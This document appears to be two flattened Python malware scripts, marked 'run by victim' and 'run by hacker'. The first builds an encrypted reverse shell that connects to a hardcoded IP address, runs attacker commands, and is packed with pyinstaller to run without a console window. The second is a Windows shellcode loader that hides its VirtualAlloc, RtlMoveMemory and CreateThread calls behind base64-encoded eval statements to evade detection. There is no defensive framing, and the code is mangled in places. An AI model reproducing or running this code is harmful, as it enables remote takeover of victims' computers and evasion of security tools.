#coding:utf-8#run by victimfrom cryptography.fernet import Fernetimport ospayload=b'''import socket, subprocessremote_ip='8.129.211.1'remote_port=12345s=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)s.connect((remote_ip,remote_port))while True:    data=s.recv(2048)    if data=='quit' or data=='exit' or data=='': break    result=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)    s.send(result.stdout.read()+result.stderr.read())s.close()'''print('Now, Encrypting......')fernet1=Fernet(Fernet.generate_key())encoded_payload=fernet1.encrypt(bytes(payload))file1=open('shellcode.py','w+')file1.write('from cryptography.fernet import Fernet'+'n'+            'fernet1=Fernet(Fernet.generate_key())'+'n'+            'encoded_payload='+encoded_payload+'n'+            'exec(fernet1.decrypt(encoded_payload))')file1.close()print('Encryption Complete.')print('Now, Compiling......')os.system('pyinstaller -F shellcode.py --noconsole')print('Compile Complete.')#run by hacker'''import sockets=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)local_ip=''local_port=12345s.bind((local_ip, local_port))s.listen(20)print('Listening...')(conn, addr)=s.accept()print('Connected by', addr)while True:    cmd=raw_input('Shell:')    conn.send(cmd)    if cmd=='quit' or cmd=='exit' or cmd=='': break    data=conn.recv(2048)    print dataconn.close()'''

#coding:utf-8#run by victimimport ctypes, base64payload =  b""payload += b"xfcxe8x8fx00x00x00x60x89xe5x31xd2x64x8b"payload += b"x52x30x8bx52x0cx8bx52x14x0fxb7x4ax26x8b"payload += b"x72x28x31xffx31xc0xacx3cx61x7cx02x2cx20"payload += b"xc1xcfx0dx01xc7x49x75xefx52x8bx52x10x8b"payload += b"x42x3cx01xd0x57x8bx40x78x85xc0x74x4cx01"payload += b"xd0x8bx58x20x8bx48x18x50x01xd3x85xc9x74"payload += b"x3cx31xffx49x8bx34x8bx01xd6x31xc0xc1xcf"payload += b"x0dxacx01xc7x38xe0x75xf4x03x7dxf8x3bx7d"payload += b"x24x75xe0x58x8bx58x24x01xd3x66x8bx0cx4b"payload += b"x8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"payload += b"x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b"payload += b"x12xe9x80xffxffxffx5dx68x33x32x00x00x68"payload += b"x77x73x32x5fx54x68x4cx77x26x07x89xe8xff"payload += b"xd0xb8x90x01x00x00x29xc4x54x50x68x29x80"payload += b"x6bx00xffxd5x6ax0ax68x08x81xd3x01x68x02"payload += b"x00x30x39x89xe6x50x50x50x50x40x50x40x50"payload += b"x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68"payload += b"x99xa5x74x61xffxd5x85xc0x74x0axffx4ex08"payload += b"x75xecxe8x67x00x00x00x6ax00x6ax04x56x57"payload += b"x68x02xd9xc8x5fxffxd5x83xf8x00x7ex36x8b"payload += b"x36x6ax40x68x00x10x00x00x56x6ax00x68x58"payload += b"xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68"payload += b"x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58x68"payload += b"x00x40x00x00x6ax00x50x68x0bx2fx0fx30xff"payload += b"xd5x57x68x75x6ex4dx61xffxd5x5ex5exffx0c"payload += b"x24x0fx85x70xffxffxffxe9x9bxffxffxffx01"payload += b"xc3x29xc6x75xc1xc3xbbxf0xb5xa2x56x6ax00"payload += b"x53xffxd5" payload=bytearray(payload)ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_intbuf=(ctypes.c_char*len(payload)).from_buffer(payload)# ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(payload)), ctypes.c_int(0x3000), ctypes.c_int(0x40))eval(base64.b64decode('cHRyPWN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihwYXlsb2FkKSksIGN0eXBlcy5jX2ludCgweDMwMDApLCBjdHlwZXMuY19pbnQoMHg0MCkp'))# ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(payload)))eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLCBidWYsIGN0eXBlcy5jX2ludChsZW4ocGF5bG9hZCkpKQ=='))# handler=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))eval(base64.b64decode('aGFuZGxlcj1jdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KHB0ciksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KDApLCBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpKQ=='))# ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handler), ctypes.c_int(-1))eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGVyKSwgY3R5cGVzLmNfaW50KC0xKSk='))